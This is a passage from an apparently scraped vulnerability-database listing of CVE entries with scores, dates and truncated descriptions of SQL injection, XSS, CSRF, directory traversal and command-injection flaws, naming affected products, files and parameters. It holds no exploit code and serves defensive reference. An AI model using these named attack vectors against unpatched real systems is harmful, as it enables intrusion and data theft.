MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5, and 1.19.x before 1.19.11, when DjVu or PDF file upload support is enabled, allows remote attackers to execute arbitrary commands via shell metacharacters in (1) the page parameter to includes/med
25-05-2016 - 11:01 30-01-2014 - 18:55
CVE-2007-5992 7.5
SQL injection vulnerability in index.php in datecomm Social Networking Script (aka Myspace Clone Script) allows remote attackers to execute arbitrary SQL commands via the seid parameter in a viewcat s action on the forums page.
11-05-2016 - 12:06 15-11-2007 - 17:46
CVE-2016-0784 4.0
Directory traversal vulnerability in the Import/Export System Backups functionality in Apache OpenMeetings before 3.1.1 allows remote authenticated administrators to write to arbitrary files via a .. (dot dot) in a ZIP archive entry.
14-04-2016 - 18:33 11-04-2016 - 10:59
CVE-2015-8399 4.0
Atlassian Confluence before 5.8.17 allows remote authenticated users to read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action.
14-04-2016 - 13:33 11-04-2016 - 17:59
CVE-2015-8398 4.3
Cross-site scripting (XSS) vulnerability in Atlassian Confluence before 5.8.17 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to rest/prototype/1/session/check.
13-04-2016 - 19:29 11-04-2016 - 17:59
CVE-2015-6541 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in the Mail interface in Zimbra Collaboration Server (ZCS) before 8.5 allow remote attackers to hijack the authentication of arbitrary users for requests that change account preferences via a
11-04-2016 - 13:44 08-04-2016 - 10:59
CVE-2014-9727 10.0
AVM Fritz!Box allows remote attackers to execute arbitrary commands via shell metacharacters in the var:lang parameter to cgi-bin/webcm.
06-04-2016 - 08:49 29-05-2015 - 11:59
CVE-2016-0793 5.0
Incomplete blacklist vulnerability in the servlet filter restriction mechanism in WildFly (formerly JBoss Application Server) before 10.0.0.Final on Windows allows remote attackers to read the sensitive files in the (1) WEB-INF or (2) META-INF direct
04-04-2016 - 13:48 01-04-2016 - 15:59
CVE-2014-3704 7.5
The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing crafted keys.
31-03-2016 - 13:36 15-10-2014 - 20:55
CVE-2013-6023 7.8
Directory traversal vulnerability in the TVT TD-2308SS-B DVR with firmware 3.2.0.P-3520A-00 and earlier allows remote attackers to read arbitrary files via .. (dot dot) in the URI.
31-03-2016 - 13:31 02-11-2013 - 17:55
CVE-2015-8279 5.0
Web Viewer 1.0.0.193 on Samsung SRN-1670D devices allows remote attackers to read arbitrary files via a request to an unspecified PHP script.
20-01-2016 - 14:53 14-01-2016 - 22:59
CVE-2015-8261 7.5
The DroneDeleteOldMeasurements implementation in Ipswitch WhatsUp Gold before 16.4 does not properly validate serialized XML objects, which allows remote attackers to conduct SQL injection attacks via a crafted SOAP request.
08-01-2016 - 14:06 07-01-2016 - 21:59
CVE-2015-5996 6.8
Cross-site request forgery (CSRF) vulnerability on Mediabridge Medialink MWN-WAPR300N devices with firmware 5.07.50 allows remote attackers to hijack the authentication of arbitrary users.
31-12-2015 - 16:12 31-12-2015 - 00:59
CVE-2015-8368 6.0
ntopng (aka ntop) before 2.2 allows remote authenticated users to change the login context and gain privileges via the user cookie and username parameter to admin/password_reset.lua.
18-12-2015 - 13:43 17-12-2015 - 14:59
CVE-2015-8566 7.5
The Session package 1.x before 1.3.1 for Joomla! Framework allows remote attackers to execute arbitrary code via unspecified session values.
17-12-2015 - 12:32 16-12-2015 - 16:59
CVE-2015-6402 4.3
Cross-site scripting (XSS) vulnerability in the management interface on Cisco EPC3928 devices with EDVA 5.5.10, 5.5.11, and 5.7.1 allows remote attackers to inject arbitrary web script or HTML via an unspecified value, aka Bug ID CSCux24935.
14-12-2015 - 22:40 13-12-2015 - 22:59
CVE-2015-6401 7.5
Cisco EPC3928 devices with EDVA 5.5.10, 5.5.11, and 5.7.1 allow remote attackers to bypass an intended authentication requirement and execute unspecified administrative functions via a crafted HTTP request, aka Bug ID CSCux24941.
14-12-2015 - 22:40 13-12-2015 - 22:59
CVE-2014-5193 4.3
Cross-site scripting (XSS) vulnerability in admin/admin.php in Sphider 1.3.6 allows remote attackers to inject arbitrary web script or HTML via the category parameter. NOTE: the url parameter vector is already covered by CVE-2014-5082.
04-12-2015 - 11:18 07-08-2014 - 07:13
CVE-2015-1494 4.3
The FancyBox for WordPress plugin before 3.0.3 for WordPress does not properly restrict access, which allows remote attackers to conduct cross-site scripting (XSS) attacks via an mfbfw[*] parameter in an update action to wp-admin/admin-post.php, as d
27-11-2015 - 14:20 17-02-2015 - 10:59
CVE-2008-2566 4.3
Multiple cross-site scripting (XSS) vulnerabilities in PHP Address Book 3.1.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the group parameter to (1) index.php or (2) the default URI.
27-11-2015 - 12:16 06-06-2008 - 14:32
CVE-2008-2565 7.5
Multiple SQL injection vulnerabilities in PHP Address Book 3.1.5 and earlier allow remote attackers to execute arbitrary SQL commands via the id parameter to (1) view.php and (2) edit.php. NOTE: it was later reported that 4.0.x is also affected.
27-11-2015 - 12:16 06-06-2008 - 14:32
CVE-2015-7808 7.5
The vB_Api_Hook::decodeArguments method in vBulletin 5 Connect 5.1.2 through 5.1.9 allows remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via a crafted serialized object in the arguments parameter to ajax/api/h
25-11-2015 - 15:23 24-11-2015 - 15:59
CVE-2008-4157 7.5
SQL injection vulnerability in groups.php in Vastal I-Tech phpVID 1.1 allows remote attackers to execute arbitrary SQL commands via the cat parameter, a different vector than CVE-2007-3610. NOTE: it was later reported that 1.2.3 is also affected.
24-11-2015 - 13:07 22-09-2008 - 14:34
CVE-2015-2049 9.0
Unrestricted file upload vulnerability in D-Link DCS-931L with firmware 1.04 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension.
24-11-2015 - 11:54 23-02-2015 - 12:59
CVE-2008-2335 4.3
Cross-site scripting (XSS) vulnerability in search_results.php in Vastal I-Tech phpVID 1.1 and 1.2 allows remote attackers to inject arbitrary web script or HTML via the query parameter. NOTE: some of these details are obtained from third party info
24-11-2015 - 11:45 19-05-2008 - 09:20
CVE-2015-1365 5.0
Directory traversal vulnerability in pixabay-images.php in the Pixabay Images plugin before 2.4 for WordPress allows remote attackers to write to arbitrary files via a .. (dot dot) in the q parameter.
23-11-2015 - 13:32 27-01-2015 - 15:04
CVE-2014-7176 6.5
SQL injection vulnerability in Enalean Tuleap before 7.5.99.4 allows remote authenticated users to execute arbitrary SQL commands via the lobal_txt parameter to plugins/docman.
20-11-2015 - 11:26 04-11-2014 - 10:55
CVE-2014-8690 4.3
Multiple cross-site scripting (XSS) vulnerabilities in Exponent CMS before 2.1.4 patch 6, 2.2.x before 2.2.3 patch 9, and 2.3.x before 2.3.1 patch 4 allow remote attackers to inject arbitrary web script or HTML via the (1) PATH_INFO, the (2) src para
19-11-2015 - 12:24 19-02-2015 - 10:59
CVE-2015-1518 7.5
SQL injection vulnerability in the search_post function in includes/search.php in Redaxscript before 2.3.0 allows remote attackers to execute arbitrary SQL commands via the search_terms parameter.
19-11-2015 - 11:55 11-02-2015 - 14:59
CVE-2014-1222 4.0
Directory traversal vulnerability in kcfinder/browse.php in Vtiger CRM before 6.0.0 Security patch 1 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter in a download action. NOTE: it is likely that thi
19-11-2015 - 11:54 12-08-2014 - 19:55
CVE-2014-5460 6.5
Unrestricted file upload vulnerability in the Tribulant Slideshow Gallery plugin before 1.4.7 for WordPress allows remote authenticated users to execute arbitrary code by uploading a PHP file, then accessing it via a direct request to the file in wp-
16-11-2015 - 23:07 11-09-2014 - 11:55
CVE-2014-6037 7.5
Directory traversal vulnerability in the agentUpload servlet in ZOHO ManageEngine EventLog Analyzer 9.0 build 9002 and 8.2 build 8020 allows remote attackers to execute arbitrary code by uploading a ZIP file which contains an executable file with ..
13-11-2015 - 12:53 26-10-2014 - 15:55
CVE-2014-5082 7.5
Multiple SQL injection vulnerabilities in admin/admin.php in Sphider 1.3.6 and earlier, Sphider Pro, and Sphider-plus allow remote attackers to execute arbitrary SQL commands via the (1) site_id or (2) url parameter.
04-11-2015 - 11:32 06-08-2014 - 14:55
CVE-2015-5285 5.0
CRLF injection vulnerability in Kallithea before 0.3 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via the came_from parameter to _admin/login.
30-10-2015 - 16:00 29-10-2015 - 16:59
CVE-2014-1695 4.3
Cross-site scripting (XSS) vulnerability in Open Ticket Request System (OTRS) 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5 allows remote attackers to inject arbitrary web script or HTML via a crafted HTML email.
13-10-2015 - 12:35 28-02-2014 - 19:01
CVE-2014-2647 4.3
Cross-site scripting (XSS) vulnerability in HP Operations Agent in HP Operations Manager (formerly OpenView Communications Broker) before 11.14 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
08-10-2015 - 11:01 18-10-2014 - 21:55
CVE-2014-2579 7.6
Multiple cross-site request forgery (CSRF) vulnerabilities in XCloner Standalone 3.5 and earlier allow remote attackers to hijack the authentication of administrators for requests that (1) change the administrator password via the config task to inde
08-10-2015 - 10:50 25-04-2014 - 16:55
CVE-2015-7707 6.5
Ignite Realtime Openfire 3.10.2 allows remote authenticated users to gain administrator access via the isadmin parameter to user-edit-form.jsp.
06-10-2015 - 14:13 05-10-2015 - 11:59
CVE-2014-4960 7.5
Multiple SQL injection vulnerabilities in models\gallery.php in Youtube Gallery (com_youtubegallery) component 4.x through 4.1.7, and possibly 3.x, for Joomla! allow remote attackers to execute arbitrary SQL commands via the (1) listid or (2) themeid
05-10-2015 - 22:37 21-07-2014 - 10:55
CVE-2014-8555 5.0
Directory traversal vulnerability in report/reportViewAction.jsp in Progress Software OpenEdge 11.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the selection parameter.
05-10-2015 - 17:45 12-11-2014 - 11:55
CVE-2015-3203 7.5
Unrestricted file upload vulnerability in h5ai before 0.25.0 allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in the directory specified by the href
29-09-2015 - 15:25 28-09-2015 - 12:59
CVE-2014-3871 7.5
Multiple SQL injection vulnerabilities in register.php in Geodesic Solutions GeoCore MAX 7.3.3 (formerly GeoClassifieds and GeoAuctions) allow remote attackers to execute arbitrary SQL commands via the (1) c[password] or (2) c[username] parameter. N
29-09-2015 - 14:48 27-05-2014 - 09:55
CVE-2015-7382 7.5
SQL injection vulnerability in install.php in Web Reference Database (aka refbase) through 0.9.6 allows remote attackers to execute arbitrary SQL commands via the defaultCharacterSet parameter, a different issue than CVE-2015-6009.
28-09-2015 - 21:07 27-09-2015 - 22:59
CVE-2015-7381 7.5
Multiple PHP remote file inclusion vulnerabilities in install.php in Web Reference Database (aka refbase) through 0.9.6 allow remote attackers to execute arbitrary PHP code via the (1) pathToMYSQL or (2) databaseStructureFile parameter, a different i
28-09-2015 - 21:06 27-09-2015 - 22:59
CVE-2015-6009 7.5
Multiple SQL injection vulnerabilities in Web Reference Database (aka refbase) through 0.9.6 allow remote attackers to execute arbitrary SQL commands via (1) the where parameter to rss.php or (2) the sqlQuery parameter to search.php, a different issu
28-09-2015 - 20:52 27-09-2015 - 22:59
CVE-2015-6008 7.5
install.php in Web Reference Database (aka refbase) through 0.9.6 allows remote attackers to execute arbitrary commands via the adminPassword parameter, a different issue than CVE-2015-7381.
28-09-2015 - 20:51 27-09-2015 - 22:59
CVE-2015-6972 4.3
Multiple cross-site scripting (XSS) vulnerabilities in Ignite Realtime Openfire 3.10.2 allow remote attackers to inject arbitrary web script or HTML via the (1) groupchatName parameter to plugins/clientcontrol/create-bookmark.jsp; the (2) urlName par
17-09-2015 - 21:54 16-09-2015 - 15:59
CVE-2015-3623 6.4
XML external entity (XXE) vulnerability in QlikTech Qlikview before 11.20 SR12 allows remote attackers to conduct server-side request forgery (SSRF) attacks and read arbitrary files via crafted XML data in a request to AccessPoint.aspx.
17-09-2015 - 14:43 16-09-2015 - 14:59
CVE-2015-6965 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in the Contact Form Generator plugin 2.0.1 and earlier for WordPress allow remote attackers to hijack the authentication of administrators for requests that (1) create a field, (2) update a f
17-09-2015 - 14:21 16-09-2015 - 10:59
CVE-2014-7280 4.3
Cross-site scripting (XSS) vulnerability in the Web UI before 2.3.4 Build #85 for Tenable Nessus 5.x allows remote web servers to inject arbitrary web script or HTML via the server header.
08-09-2015 - 14:20 21-10-2014 - 11:55
CVE-2014-5464 4.3
Cross-site scripting (XSS) vulnerability in the nDPI traffic classification library in ntopng (aka ntop) before 1.2.1 allows remote attackers to inject arbitrary web script or HTML via the HTTP Host header.
08-09-2015 - 14:20 08-09-2014 - 10:55
CVE-2015-6811 7.5
SQL injection vulnerability in the Sophos Cyberoam CR500iNG-XP firewall appliance with CyberoamOS 10.6.2 MR-1 and earlier allows remote attackers to execute arbitrary SQL commands via the username parameter to login.xml.
04-09-2015 - 14:59 04-09-2015 - 11:59
CVE-2015-6810 3.5
Cross-site scripting (XSS) vulnerability in Invision Power Services IPS Community Suite (aka Invision Power Board, IPB, or Power Board) 4.x before 4.0.12.1 allows remote authenticated users to inject arbitrary web script or HTML via the event_locatio
04-09-2015 - 14:59 04-09-2015 - 11:59
CVE-2014-9605 9.4
WebUpgrade in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and create a system backup tarball, restart the server, or stop the filters on the server via a ' (single quote) chara
04-09-2015 - 14:31 04-09-2015 - 11:59
CVE-2015-6809 4.3
Multiple cross-site scripting (XSS) vulnerabilities in BEdita before 3.6.0 allow remote attackers to inject arbitrary web script or HTML via the (1) cfg[projectName] parameter to index.php/admin/saveConfig, the (2) data[stats_provider_url] parameter
04-09-2015 - 14:26 04-09-2015 - 11:59
CVE-2014-4645 4.3
Cross-site scripting (XSS) vulnerability in dhcpinfo.html in D-link DSL-2760U-E1 allows remote attackers to inject arbitrary web script or HTML via a hostname.
02-09-2015 - 13:16 25-06-2014 - 16:55
CVE-2006-3823 5.1
SQL injection vulnerability in index.php in GeodesicSolutions (1) GeoAuctions Premier 2.0.3 and (2) GeoClassifieds Basic 2.0.3 allows remote attackers to execute arbitrary SQL commands via the b parameter.
01-09-2015 - 12:59 25-07-2006 - 09:22
CVE-2014-3878 4.3
Multiple cross-site scripting (XSS) vulnerabilities in the web client interface in Ipswitch IMail Server 12.3 and 12.4, possibly before 12.4.1.15, allow remote attackers to inject arbitrary web script or HTML via (1) the Name field in an add new cont
31-08-2015 - 14:28 05-06-2014 - 13:55
CVE-2014-3544 3.5
Cross-site scripting (XSS) vulnerability in user/profile.php in Moodle through 2.3.11, 2.4.x before 2.4.11, 2.5.x before 2.5.7, 2.6.x before 2.6.4, and 2.7.x before 2.7.1 allows remote authenticated users to inject arbitrary web script or HTML via th
31-08-2015 - 14:09 29-07-2014 - 07:10
CVE-2014-4710 4.3
Cross-site scripting (XSS) vulnerability in zero_user_account.php in ZeroCMS 1.0 allows remote attackers to inject arbitrary web script or HTML via the Full Name field.
28-08-2015 - 12:35 29-07-2014 - 10:55
CVE-2015-6519 7.5
SQL injection vulnerability in Arab Portal 3 allows remote attackers to execute arbitrary SQL commands via the showemail parameter in a signup action to members.php.
20-08-2015 - 13:38 18-08-2015 - 14:00
CVE-2015-6512 5.0
SQL injection vulnerability in the get_messages function in server/plugins/chatroom/chatroom.php in FreiChat 9.6 allows remote attackers to execute arbitrary SQL commands via the time parameter to server/freichat.php.
19-08-2015 - 19:10 18-08-2015 - 11:59
CVE-2015-6516 6.5
SQL injection vulnerability in cygnux.org sysPass 1.0.9 and earlier allows remote authenticated users to execute arbitrary SQL commands via the search parameter to ajax/ajax_search.php.
19-08-2015 - 14:51 18-08-2015 - 11:59
CVE-2015-4666 5.0
Directory traversal vulnerability in opm/read_sessionlog.php in Xceedium Xsuite 2.4.4.5 and earlier allows remote attackers to read arbitrary files via a ....// (quadruple dot double slash) in the logFile parameter.
13-08-2015 - 14:29 13-08-2015 - 10:59
CVE-2015-4665 4.3
Cross-site scripting (XSS) vulnerability in ajax_cmd.php in Xceedium Xsuite 2.4.4.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the fileName parameter.
13-08-2015 - 14:25 13-08-2015 - 10:59
CVE-2014-2043 6.5
SQL injection vulnerability in Resources/System/Templates/Data.aspx in Procentia IntelliPen before 1.1.18.1658 allows remote authenticated users to execute arbitrary SQL commands via the value parameter.
13-08-2015 - 14:04 13-03-2014 - 10:55
CVE-2014-0793 4.3
Multiple cross-site scripting (XSS) vulnerabilities in the StackIdeas Komento (com_komento) component before 1.7.3 for Joomla! allow remote attackers to inject arbitrary web script or HTML via the (1) website or (2) latitude parameter in a comment to
13-08-2015 - 13:49 30-01-2014 - 13:55
CVE-2015-4616 5.0
Directory traversal vulnerability in includes/MapPinImageSave.php in the Easy2Map plugin before 1.2.5 for WordPress allows remote attackers to create arbitrary files via a .. (dot dot) in the map_id parameter.
11-08-2015 - 10:46 08-07-2015 - 12:59
CVE-2015-4614 7.5
Multiple SQL injection vulnerabilities in includes/Function.php in the Easy2Map plugin before 1.2.5 for WordPress allow remote attackers to execute arbitrary SQL commands via the mapName parameter in an e2m_img_save_map_name action to wp-admin/admin-
11-08-2015 - 10:46 08-07-2015 - 12:59
CVE-2014-0372 5.5
Unspecified vulnerability in the Oracle Demantra Demand Management component in Oracle Supply Chain Products Suite 7.2.0.3 SQL-Server, 7.3.0, 7.3.1, 12.2.1, and 12.2.2 allows remote authenticated users to affect confidentiality and integrity via unkn
07-08-2015 - 13:42 15-01-2014 - 11:08
CVE-2014-8954 4.3
Multiple cross-site scripting (XSS) vulnerabilities in phpSound 1.0.5 allow remote attackers to inject arbitrary web script or HTML via the (1) Title or (2) Description fields in a playlist or the (3) filter parameter in an explore action to index.ph
06-08-2015 - 12:45 17-11-2014 - 11:59
CVE-2014-2009 5.0
The mPAY24 payment module before 1.6 for PrestaShop allows remote attackers to obtain credentials, the installation path, and other sensitive information via a direct request to api/curllog.log.
05-08-2015 - 12:34 12-09-2014 - 10:55
CVE-2014-2008 7.5
SQL injection vulnerability in confirm.php in the mPAY24 payment module before 1.6 for PrestaShop allows remote attackers to execute arbitrary SQL commands via the TID parameter.
05-08-2015 - 12:34 12-09-2014 - 10:55
CVE-2014-3740 3.5
Cross-site scripting (XSS) vulnerability in SpiceWorks before 7.2.00195 allows remote authenticated users to inject arbitrary web script or HTML via the Summary field in a ticket request to the portal page.
31-07-2015 - 21:41 11-09-2014 - 14:55
CVE-2014-3738 4.3
Cross-site scripting (XSS) vulnerability in Zenoss 4.2.5 allows remote attackers to inject arbitrary web script or HTML via the title of a device.
31-07-2015 - 21:40 20-05-2014 - 10:55
CVE-2014-3247 4.3
Cross-site scripting (XSS) vulnerability in Collabtive 1.2 allows remote authenticated users to inject arbitrary web script or HTML via the desc parameter in an Add project (addpro) action to admin.php.
31-07-2015 - 21:38 15-05-2014 - 10:55
CVE-2014-3110 4.3
Multiple cross-site scripting (XSS) vulnerabilities on Honeywell FALCON XLWeb Linux controller devices 2.04.01 and earlier and FALCON XLWeb XLWebExe controller devices 2.02.11 and earlier allow remote attackers to inject arbitrary web script or HTML
31-07-2015 - 21:36 24-07-2014 - 10:55
CVE-2013-2639 4.3
Cross-site scripting (XSS) vulnerability in CTERA Cloud Storage OS before 3.2.29.0, 3.2.42.0, and earlier allows remote attackers to inject arbitrary web script or HTML via the description in a project folder.
30-07-2015 - 10:43 11-02-2014 - 12:55
CVE-2014-1843 5.0
Directory traversal vulnerability in the web interface in Titan FTP Server before 10.40 build 1829 allows remote attackers to obtain the property information of an arbitrary home folder via a Properties action with a .. (dot dot) in the src parameter
29-07-2015 - 12:19 29-04-2014 - 06:37
CVE-2014-1842 5.0
Directory traversal vulnerability in the web interface in Titan FTP Server before 10.40 build 1829 allows remote attackers to list all usernames via a Go action with a .. (dot dot) in the search-bar value.
29-07-2015 - 12:18 29-04-2014 - 06:37
CVE-2014-1841 5.0
Directory traversal vulnerability in the web interface in Titan FTP Server before 10.40 build 1829 allows remote attackers to copy an arbitrary user's home folder via a Move action with a .. (dot dot) in the src parameter.
29-07-2015 - 12:17 29-04-2014 - 06:37
CVE-2015-2183 7.5
Multiple SQL injection vulnerabilities in the administrative backend in ZeusCart 4 allow remote administrators to execute arbitrary SQL commands via the id parameter in a (1) disporders detail or (2) subadminmgt edit action or (3) cid parameter in an
28-07-2015 - 11:05 10-03-2015 - 10:59
CVE-2013-6872 6.5
SQL injection vulnerability in managetimetracker.php in Collabtive before 1.2 allows remote authenticated users to execute arbitrary SQL commands via the id parameter in a projectpdf action.
28-07-2015 - 10:49 21-01-2014 - 10:17
CVE-2008-6844 7.5
The registration view (/user/register) in eZ Publish 3.5.6 and earlier, and possibly other versions before 3.9.5, 3.10.1, and 4.0.1, allows remote attackers to gain privileges as other users via modified ContentObjectAttribute_data_user_login_30, Con
27-07-2015 - 14:36 02-07-2009 - 06:30
CVE-2013-6058 7.5
SQL injection vulnerability in appRain CMF 3.0.2 and earlier allows remote attackers to execute arbitrary SQL commands via the PATH_INFO to blog-by-cat/.
27-07-2015 - 12:11 14-11-2013 - 15:55
CVE-2014-0620 4.3
Multiple cross-site scripting (XSS) vulnerabilities in Technicolor (formerly Thomson) TC7200 STD6.01.12 allow remote attackers to inject arbitrary web script or HTML via the (1) ADDNewDomain parameter to parental/website-filters.asp or (2) VmTracerou
24-07-2015 - 14:38 08-01-2014 - 10:30
CVE-2014-0780 7.5
Directory traversal vulnerability in NTWebServer in InduSoft Web Studio 7.1 before SP2 Patch 4 allows remote attackers to read administrative passwords in APP files, and consequently execute arbitrary code, via unspecified web requests.
24-07-2015 - 14:35 25-04-2014 - 01:12
CVE-2015-5530 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in Free Reprintables ArticleFR 3.0.6 allow remote attackers to hijack the authentication of administrators for requests that add an administrator account via a request to dashboard/users/crea
21-07-2015 - 07:26 16-07-2015 - 11:59
CVE-2015-5529 4.3
Multiple cross-site scripting (XSS) vulnerabilities in Free Reprintables ArticleFR 3.0.6 allow remote attackers to inject arbitrary web script or HTML via the (1) name parameter to dashboard/settings/categories/, (2) title or (3) rel parameter to das
21-07-2015 - 07:25 16-07-2015 - 11:59
CVE-2015-5520 4.3
Cross-site scripting (XSS) vulnerability in the Users module in Orchard 1.7.3 through 1.8.2 and 1.9.x before 1.9.1 allows remote attackers to inject arbitrary web script or HTML via the username when creating a new user account, which is not properly
17-07-2015 - 18:32 14-07-2015 - 12:59
CVE-2015-1579 5.0
Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerab
14-07-2015 - 14:22 11-02-2015 - 14:59
CVE-2015-5150 3.5
Multiple cross-site scripting (XSS) vulnerabilities in Zoho ManageEngine SupportCenter Plus 7.90 allow remote authenticated users to inject arbitrary web script or HTML via the (1) query parameter in the run_query_editor_query module to CustomReportH
01-07-2015 - 11:43 30-06-2015 - 10:59
CVE-2015-5148 7.5
SQL injection vulnerability in LivelyCart 1.2.0 allows remote attackers to execute arbitrary SQL commands via the search_query parameter to product/search.
01-07-2015 - 11:36 30-06-2015 - 10:59
CVE-2014-9734 5.0
Directory traversal vulnerability in the Slider Revolution (revslider) plugin before 4.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php
01-07-2015 - 11:12 30-06-2015 - 10:59
CVE-2015-4018 6.5
SQL injection vulnerability in feedwordpresssyndicationpage.class.php in the FeedWordPress plugin before 2015.0514 for WordPress allows remote authenticated users to execute arbitrary SQL commands via the link_ids[] parameter in an Update action in t
25-06-2015 - 12:22 21-05-2015 - 16:59
CVE-2015-3337 4.3
Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.
25-06-2015 - 12:07 01-05-2015 - 11:59
CVE-2015-3325 7.5
SQL injection vulnerability in forum.php in the WP Symposium plugin before 15.4 for WordPress allows remote attackers to execute arbitrary SQL commands via the show parameter in the QUERY_STRING to the default URI.
25-06-2015 - 11:50 15-05-2015 - 14:59
CVE-2015-4658 7.5
Multiple SQL injection vulnerabilities in admin/login.php in Milw0rm Clone Script